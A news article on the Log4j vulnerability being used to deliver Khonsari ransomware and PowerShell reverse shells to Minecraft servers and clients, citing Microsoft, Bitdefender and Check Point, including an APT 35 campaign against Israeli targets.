Ransomware Gang Hijacking Log4j Bug To Hit Minecraft Servers

Outside of the ransomware space, Iranian hacking group APT 35 has attempted to exploit the Log4j flaw against seven targets in the Israeli government and business sector over the past day, Check Point said.

ARTICLE TITLE HERE

A small number of Minecraft customers running their own servers with a vulnerable version of Log4j have been hit with Khonsari ransomware, Microsoft reported Wednesday.

The Redmond, Wash.-based software giant said adversaries have been sending malicious in-game messages to vulnerable Minecraft servers. The servers then exploit the Log4j vulnerability to retrieve and execute an attacker-hosted payload on both the server as well as connected vulnerable clients, according to Microsoft.

“Due to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers,” Microsoft’s unified threat intelligence team wrote in a blog post.

id
unit-1659132512259
type
Sponsored post

[Related: Nation-State, Ransomware Groups Using Log4j Bug In Attacks]

Minecraft customers playing on a server hosted by Microsoft had a patched version of the game download automatically after shutting down and restarting the Minecraft Launcher, according to Microsoft, which purchased the video game and accompanying intellectual property for $2.5 billion in 2014.

The Khonsari ransomware is packaged as a malicious Java class file and executed in the context of javaw.exe to ransom the device. Microsoft said its findings confirm Bucharest, Romania-based Bitdefender’s earlier report that Khonsari ransomware is being delivered as a payload following exploitation of the Log4j vulnerability.

While it’s uncommon for Minecraft to be installed in enterprise networks, Microsoft said it has also observed PowerShell-based reverse shells being dropped to Minecraft client systems via malicious in-game messages. This gives the adversary full access to a compromised system, which they can then use to run Mimikatz and steal credentials, according to Microsoft.

Microsoft said the dropping of PowerShell-based reverse shells is typically associated with enterprise compromises in hopes of facilitating lateral movement. However, Microsoft said it hasn’t observed any follow-on activity from the reverse shell campaign at this time, which indicates the threat group may be gathering access for later use.

Minecraft has directed customers hosting their own servers to either download a file to the working directory where their server runs or add JVM arguments to their startup command line depending on which version they’re using. Also, modified clients and third-party launchers might not automatically update, and Minecraft has told users in that position to follow the advice of their third-party provider.

Microsoft’s warning about Khonsari ransomware comes two days after Bitdefender said the nascent ransomware family was attempting to exploit the Log4j vulnerability against users running Windows operating systems. A malicious .NET binary file downloaded as part of the ransomware attack will list all the drives on the user’s system and encrypt them entirely, except the C:\ drive, Bitdefender said.

On the C:\ drive, Bitdefender said, Khonsari encrypts only the Documents, Videos, Pictures, Downloads and Desktop files. A ransom note from Khonsari is written in the Desktop folder of the C:\ drive and opened with Notepad, according to Bitdefender.

“Your files have been encrypted and stolen by the Khonsari family,” Khonsari writes in its ransom note, according to Bitdefender. “If you wish to decrypt, call (***) ***-1309 or email kar***[email protected] you do not know how to buy btc [Bitcoin], use a search engine to find exchanges.DO NOT MODIFY OR DELETE THIS FILE OR ANY ENCRYPTED FILES. IF YOU DO, YOUR FILES MAY BE UNRECOVERABLE.”

Outside of the ransomware arena, Check Point said Wednesday that state-sponsored Iranian hacking group APT 35 has attempted to exploit the Log4j vulnerability against seven targets in the Israeli government and business sector over the preceding 24 hours. Check Point witnessed communications between a server used by APT 35 and its targets in Israel, and was therefore able to block these attacks.

The attack took place between 9 a.m. ET and 7 p.m. ET Wednesday, and Check Point said there’s no evidence associated with APT 35’s related activity against targets outside of Israel. APT 35’s Israeli-focused campaign comes a day after an attempt to exploit the Log4j vulnerability resulted in a real-life attack by a crypto mining group against five countries, Check Point found.

“Reports of the last 48 hours prove that both criminal hacking groups and nation state actors are engaged in the exploration of this vulnerability, and we should all assume more such actors’ operation are to be revealed in the coming days,” Check Point wrote in a blog post.